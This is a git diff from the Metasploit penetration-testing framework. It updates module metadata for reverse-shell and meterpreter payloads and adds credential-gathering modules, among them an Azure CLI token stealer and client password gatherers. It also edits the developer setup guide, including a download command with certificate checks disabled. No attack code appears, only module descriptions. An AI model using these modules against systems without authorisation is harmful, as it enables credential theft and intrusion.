+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/ppce500v2/meterpreter_reverse_https",
@@ -231789,7 +234326,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/ppce500v2/meterpreter_reverse_tcp",
@@ -231982,7 +234519,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/meterpreter_reverse_http",
@@ -232020,7 +234557,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/meterpreter_reverse_https",
@@ -232058,7 +234595,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/meterpreter_reverse_tcp",
@@ -233012,7 +235549,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/meterpreter_reverse_http",
@@ -233050,7 +235587,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/meterpreter_reverse_https",
@@ -233088,7 +235625,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/meterpreter_reverse_tcp",
@@ -233882,7 +236419,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/zarch/meterpreter_reverse_http",
@@ -233920,7 +236457,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/zarch/meterpreter_reverse_https",
@@ -233958,7 +236495,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/zarch/meterpreter_reverse_tcp",
@@ -234232,6 +236769,42 @@
    "payload_type": 1,
    "staged": false
  },
+  "payload_osx/aarch64/exec": {
+    "name": "OSX aarch64 Execute Command",
+    "fullname": "payload/osx/aarch64/exec",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "alanfoster"
+    ],
+    "description": "Execute an arbitrary command",
+    "references": [
+
+    ],
+    "platform": "OSX",
+    "arch": "aarch64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-12-30 16:26:31 +0000",
+    "path": "/modules/payloads/singles/osx/aarch64/exec.rb",
+    "is_install_path": true,
+    "ref_name": "osx/aarch64/exec",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 1,
+    "staged": false
+  },
  "payload_osx/aarch64/meterpreter/reverse_tcp": {
    "name": "OSX Meterpreter, Reverse TCP Stager",
    "fullname": "payload/osx/aarch64/meterpreter/reverse_tcp",
@@ -234299,7 +236872,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/osx/aarch64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "osx/aarch64/meterpreter_reverse_http",
@@ -234338,7 +236911,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/osx/aarch64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "osx/aarch64/meterpreter_reverse_https",
@@ -234377,7 +236950,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/osx/aarch64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "osx/aarch64/meterpreter_reverse_tcp",
@@ -234391,6 +236964,78 @@
    "payload_type": 1,
    "staged": false
  },
+  "payload_osx/aarch64/shell_bind_tcp": {
+    "name": "OS X x64 Shell Bind TCP",
+    "fullname": "payload/osx/aarch64/shell_bind_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "alanfoster"
+    ],
+    "description": "Bind an arbitrary command to an arbitrary port",
+    "references": [
+
+    ],
+    "platform": "OSX",
+    "arch": "aarch64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2024-02-01 01:05:40 +0000",
+    "path": "/modules/payloads/singles/osx/aarch64/shell_bind_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "osx/aarch64/shell_bind_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 1,
+    "staged": false
+  },
+  "payload_osx/aarch64/shell_reverse_tcp": {
+    "name": "OSX aarch64 Shell Reverse TCP",
+    "fullname": "payload/osx/aarch64/shell_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "alanfoster"
+    ],
+    "description": "Connect back to attacker and spawn a command shell",
+    "references": [
+
+    ],
+    "platform": "OSX",
+    "arch": "aarch64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2024-01-02 14:13:07 +0000",
+    "path": "/modules/payloads/singles/osx/aarch64/shell_reverse_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "osx/aarch64/shell_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 1,
+    "staged": false
+  },
  "payload_osx/armle/execute/bind_tcp": {
    "name": "OS X Write and Execute Binary, Bind TCP Stager",
    "fullname": "payload/osx/armle/execute/bind_tcp",
@@ -235140,7 +237785,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "osx/x64/meterpreter_reverse_http",
@@ -235178,7 +237823,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "osx/x64/meterpreter_reverse_https",
@@ -235216,7 +237861,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "osx/x64/meterpreter_reverse_tcp",
@@ -251533,7 +254178,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-11-07 18:55:42 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/post/linux/gather/apache_nifi_credentials.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/apache_nifi_credentials",
@@ -251576,13 +254221,13 @@
    "references": [

    ],
-    "platform": "Linux",
+    "platform": "Linux,Unix",
    "arch": "",
    "rport": null,
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-07-19 19:47:17 +0000",
+    "mod_time": "2024-04-26 21:58:43 +0000",
    "path": "/modules/post/linux/gather/checkcontainer.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/checkcontainer",
@@ -251590,6 +254235,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": [
      "shell",
@@ -253353,6 +256007,55 @@

    ]
  },
+  "post_multi/gather/azure_cli_creds": {
+    "name": "Azure CLI Credentials Gatherer",
+    "fullname": "post/multi/gather/azure_cli_creds",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "James Otten <jamesotten1@gmail.com>",
+      "h00die"
+    ],
+    "description": "This module will collect the Azure CLI 2.0+ (az cli) settings files\n          for all users on a given target. These configuration files contain\n          JWT tokens used to authenticate users and other subscription information.\n          Once tokens are stolen from one host, they can be used to impersonate\n          the user from a different host.",
+    "references": [
+
+    ],
+    "platform": "Linux,OSX,Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2024-06-27 10:45:05 +0000",
+    "path": "/modules/post/multi/gather/azure_cli_creds.rb",
+    "is_install_path": true,
+    "ref_name": "multi/gather/azure_cli_creds",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": [
+      "meterpreter"
+    ],
+    "needs_cleanup": null,
+    "actions": [
+
+    ]
+  },
  "post_multi/gather/check_malware": {
    "name": "Multi Gather Malware Verifier",
    "fullname": "post/multi/gather/check_malware",
@@ -253455,7 +256158,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-01-11 20:00:09 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/post/multi/gather/dbeaver.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/dbeaver",
@@ -254845,7 +257548,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-12-23 13:52:52 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/post/multi/gather/saltstack_salt.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/saltstack_salt",
@@ -258555,6 +261258,58 @@

    ]
  },
+  "post_windows/gather/credentials/adi_irc": {
+    "name": "Adi IRC credential gatherer",
+    "fullname": "post/windows/gather/credentials/adi_irc",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "Jacob Tierney",
+      "Kazuyoshi Maruta",
+      "Daniel Hallsworth",
+      "Barwar Salim M",
+      "Z. Cliffe Schreuders"
+    ],
+    "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n          Further details can be found in the module documentation.\n          This is a module that searches for credentials stored on AdiIRC Client in a windows remote host.",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2024-05-15 15:05:42 +0000",
+    "path": "/modules/post/windows/gather/credentials/adi_irc.rb",
+    "is_install_path": true,
+    "ref_name": "windows/gather/credentials/adi_irc",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": [
+      "meterpreter"
+    ],
+    "needs_cleanup": null,
+    "actions": [
+
+    ]
+  },
  "post_windows/gather/credentials/aim": {
    "name": "Aim credential gatherer",
    "fullname": "post/windows/gather/credentials/aim",
@@ -258684,6 +261439,58 @@

    ]
  },
+  "post_windows/gather/credentials/carotdav_ftp": {
+    "name": "CarotDAV credential gatherer",
+    "fullname": "post/windows/gather/credentials/carotdav_ftp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "Jacob Tierney",
+      "Kazuyoshi Maruta",
+      "Daniel Hallsworth",
+      "Barwar Salim M",
+      "Z. Cliffe Schreuders"
+    ],
+    "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n          Further details can be found in the module documentation.\n          This is a module that searches for credentials stored on CarotDAV FTP Client in a windows remote host.",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2024-05-15 14:52:58 +0000",
+    "path": "/modules/post/windows/gather/credentials/carotdav_ftp.rb",
+    "is_install_path": true,
+    "ref_name": "windows/gather/credentials/carotdav_ftp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": [
+      "meterpreter"
+    ],
+    "needs_cleanup": null,
+    "actions": [
+
+    ]
+  },
  "post_windows/gather/credentials/chrome": {
    "name": "Chrome credential gatherer",
    "fullname": "post/windows/gather/credentials/chrome",
@@ -259551,6 +262358,58 @@

    ]
  },
+  "post_windows/gather/credentials/halloy_irc": {
+    "name": "Halloy IRC credential gatherer",
+    "fullname": "post/windows/gather/credentials/halloy_irc",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "Jacob Tierney",
+      "Kazuyoshi Maruta",
+      "Daniel Hallsworth",
+      "Barwar Salim M",
+      "Z. Cliffe Schreuders"
+    ],
+    "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n          Further details can be found in the module documentation.\n          This is a module that searches for credentials stored on Halloy IRC Client in a windows remote host.",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2024-05-15 14:07:48 +0000",
+    "path": "/modules/post/windows/gather/credentials/halloy_irc.rb",
+    "is_install_path": true,
+    "ref_name": "windows/gather/credentials/halloy_irc",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": [
+      "meterpreter"
+    ],
+    "needs_cleanup": null,
+    "actions": [
+
+    ]
+  },
  "post_windows/gather/credentials/heidisql": {
    "name": "Windows Gather HeidiSQL Saved Password Extraction",
    "fullname": "post/windows/gather/credentials/heidisql",
@@ -260257,7 +263116,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-10-06 01:39:28 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/post/windows/gather/credentials/moba_xterm.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/moba_xterm",
@@ -260838,6 +263697,58 @@

    ]
  },
+  "post_windows/gather/credentials/quassel_irc": {
+    "name": "Quassel IRC credential gatherer",
+    "fullname": "post/windows/gather/credentials/quassel_irc",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "Jacob Tierney",
+      "Kazuyoshi Maruta",
+      "Daniel Hallsworth",
+      "Barwar Salim M",
+      "Z. Cliffe Schreuders"
+    ],
+    "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n          Further details can be found in the module documentation.\n          This is a module that searches for credentials stored on Quassel IRC Client in a windows remote host.",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2024-05-15 15:09:51 +0000",
+    "path": "/modules/post/windows/gather/credentials/quassel_irc.rb",
+    "is_install_path": true,
+    "ref_name": "windows/gather/credentials/quassel_irc",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": [
+      "meterpreter"
+    ],
+    "needs_cleanup": null,
+    "actions": [
+
+    ]
+  },
  "post_windows/gather/credentials/razer_synapse": {
    "name": "Windows Gather Razer Synapse Password Extraction",
    "fullname": "post/windows/gather/credentials/razer_synapse",
@@ -261132,7 +264043,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-02-08 13:47:34 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/post/windows/gather/credentials/securecrt.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/securecrt",
@@ -261305,7 +264216,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-12-20 08:55:19 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/post/windows/gather/credentials/solarwinds_orion_dump.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/solarwinds_orion_dump",
@@ -261511,6 +264422,58 @@

    ]
  },
+  "post_windows/gather/credentials/sylpheed": {
+    "name": "Sylpheed email credential gatherer",
+    "fullname": "post/windows/gather/credentials/sylpheed",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "Jacob Tierney",
+      "Kazuyoshi Maruta",
+      "Daniel Hallsworth",
+      "Barwar Salim M",
+      "Z. Cliffe Schreuders"
+    ],
+    "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n          Further details can be found in the module documentation.\n          This is a module that searches for credentials stored on Sylpheed email client in a windows remote host.",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2024-05-15 14:58:51 +0000",
+    "path": "/modules/post/windows/gather/credentials/sylpheed.rb",
+    "is_install_path": true,
+    "ref_name": "windows/gather/credentials/sylpheed",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": [
+      "meterpreter"
+    ],
+    "needs_cleanup": null,
+    "actions": [
+
+    ]
+  },
  "post_windows/gather/credentials/tango": {
    "name": "Tango credential gatherer",
    "fullname": "post/windows/gather/credentials/tango",
@@ -261901,7 +264864,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-01-18 14:27:28 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/post/windows/gather/credentials/veeam_credential_dump.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/veeam_credential_dump",
@@ -262060,7 +265023,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-02-23 16:34:43 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/post/windows/gather/credentials/whatsupgold_credential_dump.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/whatsupgold_credential_dump",
@@ -263897,7 +266860,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-02-03 18:12:53 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/post/windows/gather/enum_onedrive.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_onedrive",
@@ -265800,7 +268763,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-02-03 18:12:53 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/post/windows/manage/add_user.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/add_user",
@@ -1 +1 @@
-3.0.5
+3.1.5
@@ -76,11 +76,13 @@ GEM
    rb-fsevent (0.11.2)
    rb-inotify (0.10.1)
      ffi (~> 1.0)
-    rexml (3.2.5)
+    rexml (3.2.7)
+      strscan (>= 3.0.9)
    rouge (4.0.0)
    safe_yaml (1.0.5)
    sassc (2.4.0)
      ffi (~> 1.9)
+    strscan (3.1.0)
    terminal-table (3.0.2)
      unicode-display_width (>= 1.1.1, < 3)
    unicode-display_width (2.3.0)
@@ -22,7 +22,7 @@ This guide has details for setting up both **Linux** and **Windows**.

 ### Linux

-1. Open a terminal on your Linux host and set up Git, build tools, and Ruby dependencies:
+* Open a terminal on your Linux host and set up Git, build tools, and Ruby dependencies:

 ```bash
 sudo apt update && sudo apt install -y git autoconf build-essential libpcap-dev libpq-dev zlib1g-dev libsqlite3-dev
@@ -32,9 +32,9 @@ sudo apt update && sudo apt install -y git autoconf build-essential libpcap-dev

 If you are running a Windows machine

-1. Install [chocolatey](https://chocolatey.org/)
-2. Install [Ruby x64 with DevKit](https://github.com/oneclick/rubyinstaller2/releases/download/RubyInstaller-3.0.3-1/rubyinstaller-devkit-3.0.3-1-x64.exe)
-3. Install pcaprub dependencies from your cmd.exe terminal:
+* Install [chocolatey](https://chocolatey.org/)
+* Install [Ruby x64 with DevKit](https://github.com/oneclick/rubyinstaller2/releases/download/RubyInstaller-3.0.3-1/rubyinstaller-devkit-3.0.3-1-x64.exe)
+* Install pcaprub dependencies from your cmd.exe terminal:

 ```
 powershell -Command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object System.Net.WebClient).DownloadFile('https://www.winpcap.org/install/bin/WpdPack_4_1_2.zip', 'C:\Windows\Temp\WpdPack_4_1_2.zip')"
@@ -43,7 +43,7 @@ choco install 7zip
 7z x "C:\Windows\Temp\WpdPack_4_1_2.zip" -o"C:\"
 ```

-4. Install a version of PostgreSQL:
+Install a version of PostgreSQL:

 ```
 choco install postgresql12
@@ -53,9 +53,8 @@ choco install postgresql12

 You will need to use Github to create a fork for your contributions and receive the latest updates from our repository.

-1. Login to Github and click the "Fork" button in the top-right corner of the [metasploit-framework] repository.
-
-2.  Create a `git` directory in your home folder and clone your fork to your local machine:
+* Login to Github and click the "Fork" button in the top-right corner of the [metasploit-framework] repository.
+* Create a `git` directory in your home folder and clone your fork to your local machine:

 ```bash
 export GITHUB_USERNAME=YOUR_USERNAME_FOR_GITHUB
@@ -66,9 +65,8 @@ git clone git@github.com:$GITHUB_USERNAME/metasploit-framework
 cd ~/git/metasploit-framework
 ```

-3. If you encounter a "permission denied" error on the above command, research the error message.  If there isn't an explicit reason given, confirm that your [Github SSH key is configured correctly][github-ssh-instructions]. You will need to associate your [public SSH key][ssh-key] with your GitHub account, otherwise if you set up a SSH key and don't associate it with your GitHub account, you will receive this "permission denied" error.
-
-4. To receive updates, you will create an `upstream-master` branch to track the Rapid7 remote repository, alongside your `master` branch which will point to your personal repository's fork:
+* If you encounter a "permission denied" error on the above command, research the error message.  If there isn't an explicit reason given, confirm that your [Github SSH key is configured correctly][github-ssh-instructions]. You will need to associate your [public SSH key][ssh-key] with your GitHub account, otherwise if you set up a SSH key and don't associate it with your GitHub account, you will receive this "permission denied" error.
+* To receive updates, you will create an `upstream-master` branch to track the Rapid7 remote repository, alongside your `master` branch which will point to your personal repository's fork:

 ```bash
 git remote add upstream git@github.com:rapid7/metasploit-framework.git
@@ -76,7 +74,7 @@ git fetch upstream
 git checkout -b upstream-master --track upstream/master
 ```

-5. Configure your Github username, email address, and username.  Ensure your `user.email` matches the email address you registered with your Github account.
+* Configure your Github username, email address, and username.  Ensure your `user.email` matches the email address you registered with your Github account.

 ```bash
 git config --global user.name "$GITHUB_USERNAME"
@@ -84,7 +82,7 @@ git config --global user.email "$GITHUB_EMAIL"
 git config --global github.user "$GITHUB_USERNAME"
 ```

-6. Set up [msftidy] to run before each `git commit` and after each `git merge` to quickly identify potential issues with your contributions:
+* Set up [msftidy] to run before each `git commit` and after each `git merge` to quickly identify potential issues with your contributions:

 ```bash
 cd ~/git/metasploit-framework
@@ -129,27 +127,60 @@ Congratulations! You have now set up a development environment and the latest ve

 ## Optional: Set up the REST API and PostgreSQL database

-The following optional section describes how to manually install PostgreSQL and set up the Metasploit database.  Alternatively, use our Omnibus installer which handles this more reliably.
+Installing the REST API and PostgreSQL is optional, and can be done in two ways.
+Recommended is to use the Docker approach, and fairly simple to do once you have docker installed on your
+system, [Docker Desktop][docker-desktop] is recommended, but not mandatory.
+On Linux systems, simply having docker-cli is sufficient.

-1. Confirm that the PostgreSQL server and client are installed:
+### Docker Installation
+
+**Make sure, you have docker available on your system: [Docker Installation Guide][docker-installation]**
+
+**Note**: Depending on your environment, these commands might require `sudo`
+
+* Start the postgres container:
+
+```bash
+docker run --rm -it -p 127.0.0.1:5433:5432 -e POSTGRES_PASSWORD="mysecretpassword" postgres:14
+```
+
+Wait till the postgres container is fully running.
+
+* Configure the Metasploit database:
+
+```
+cd ~/git/metasploit-framework
+./msfdb init --connection-string="postgres://postgres:mysecretpassword@127.0.0.1:5433/postgres"
+```
+
+* If the `msfdb init` command succeeds, then confirm that the database is accessible to Metasploit:
+
+```bash
+$ ./msfconsole -qx "db_status; exit"
+```
+
+### Manual Installation
+
+The following optional section describes how to manually install PostgreSQL and set up the Metasploit database.
+Alternatively, use our Omnibus installer which handles this more reliably.
+
+* Confirm that the PostgreSQL server and client are installed:

 ```bash
 sudo apt update && sudo apt-get install -y postgresql postgresql-client
 sudo service postgresql start && sudo update-rc.d postgresql enable
 ```

-2. Ensure that you are not running as the root user.
-
-3. Initialize the Metasploit database:
+* Ensure that you are not running as the root user.
+* Initialize the Metasploit database:

 ```bash
 cd ~/git/metasploit-framework
 ./msfdb init
 ```

-4. If you receive an error about a component not being installed, confirm that the binaries shown are in your path using the [which] and [find] commands, then modifying your [$PATH] environment variable.  If it was something else, open a [new issue] to let us know what happened.
-
-5. If the `msfdb init` command succeeds, then confirm that the database is accessible to Metasploit:
+* If you receive an error about a component not being installed, confirm that the binaries shown are in your path using the [which] and [find] commands, then modifying your [$PATH] environment variable.  If it was something else, open a [new issue] to let us know what happened.
+* If the `msfdb init` command succeeds, then confirm that the database is accessible to Metasploit:

 ```bash
 $ ./msfconsole -qx "db_status; exit"
@@ -222,7 +253,7 @@ To run tests defined in file(s):
 bundle exec rspec ./spec/path/to/your/tests_1.rb ./spec/path/to/your/tests_2.rb
 ```

-To run run the tests defined at a line number - for instance line 23:
+To run the tests defined at a line number - for instance line 23:

 ```
 bundle exec rspec ./spec/path/to/your/tests_1.rb:23
@@ -272,3 +303,5 @@ Finally, we welcome your feedback on this guide, so feel free to reach out to us
 [@ffmike]:https://github.com/ffmike

 [BetterSpecs.org]:https://www.betterspecs.org/
+[docker-desktop]:https://www.docker.com/products/docker-desktop/
+[docker-installation]:https://www.docker.com/get-started/
@@ -0,0 +1,72 @@
+## Vulnerable Application
+
